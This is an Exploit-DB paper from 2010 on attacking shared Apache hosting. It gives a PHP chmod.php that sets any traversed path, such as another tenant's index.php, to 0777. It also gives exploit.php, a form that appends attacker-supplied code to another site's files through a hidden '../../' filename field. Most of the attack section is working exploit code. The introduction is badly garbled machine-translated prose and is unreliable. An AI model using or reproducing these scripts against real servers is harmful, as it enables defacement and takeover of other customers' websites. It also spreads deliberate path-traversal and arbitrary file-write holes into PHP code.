Changing CHMOD permissions / Traverse Base FTP/MultiHosting

EDB-ID:

13686

CVE:

N/A

Author:

GlaDiaT0R

Type:

papers

Platform:

Multiple

Published:

2010-04-24

#########################################################################
# [+]Title: [Changing CHMOD permissions / Traverse Base FTP/MultiHosting]
#########################################################################
# [+] About :
#########################################################################
# Written by :  GlaDiaT0R  
# Contact:  the_gl4di4t0r[AT]hotmail[DOT]com
# Team :  Tunisian Power Team  ( DarkGh0st.Net )
# Greetz: Allah, Boomrang_victim, M4rw3n_Neo, Alphanix & all my friends 
#in security Challenge days 2010
#########################################################################
# [+]    Summary: 
#           [1]-Introduction
#           [2]-Detection
#           [3]-Exploit
#########################################################################

[1] Introduction


Writing to a third party file (fopen), or upload a file desired function are already at risk for web applications,
but they can also be certain that neglects Multihosting apache permissions CHMOD modified law.
Indeed, a hacker with a acces a site Multihosting could then modify the right CHMOD file and directory
based on other web application presents the breasts of the host then giving the opportunity for the attacker to write code intended to have access to the source,
and uploading the file from its location due to pampers (vulnerable to changes in law chmod).
2 feat enough: the modification of law chmod a desired location (detection) and writing on a (fopen)
(Or upload the file selected) through the designated FTP (although sour on the same host).

-----------------------------------------------------------------------------------------------------------------------------------------------
 [2] Detection

chmod.php?path=../../other website in the server/index.php

<?php
$path = stripslashes($_GET['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo " CHMOD OK , Permission editable file or directory. Permission to write";
?>


Now, we have  "Operation not permitted" in case of failure, and of course "Permission editable file or directory. Permission to write" if successful

-----------------------------------------------------------------------------------------------------------------------------------------------
[3] Exploit 
Once you find a write permission based on another FTP based on the vulnerable MultiHosting,
it's all! Now , you have to upload or modify it contained a file.


==================================================================

exploit.php : 

<?php

         @$filename = stripslashes($_POST['filename']);
         @$mess = stripslashes($_POST['mess']);   
     $fp = @fopen("{$_POST['filename']}", 'a');
         @fputs($fp,"$mess <hr size=\"1\" color=\"black\">");
         @fclose($fp);
?> 

<form name="form1" action="exploit.php" method="post">
<p align="center"><b>
<br>
CODE :<br>
<textarea name="mess" rows="3">&lt;/textarea&gt;</font></b>&lt;/textarea&gt;
</font></b> <p><input type="hidden" name="filename" value="../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php"></p>
<center>
<input type="reset" name="Submit" value="Delete">
<input name="go" type="submit" value="Send" onClick="javascript:this.style.visibility ='hidden';">
<center>
</form>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Changing CHMOD Permissions Exploit -  Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title>
</head>
<body>
</center>
</body>
</html>



####
Links |  Fopen: http://php.net/manual/fr/function.fopen.php        
         CHMOD: http://en.wikipedia.org/wiki/Chmod
         GOOGLE:http://google.com
####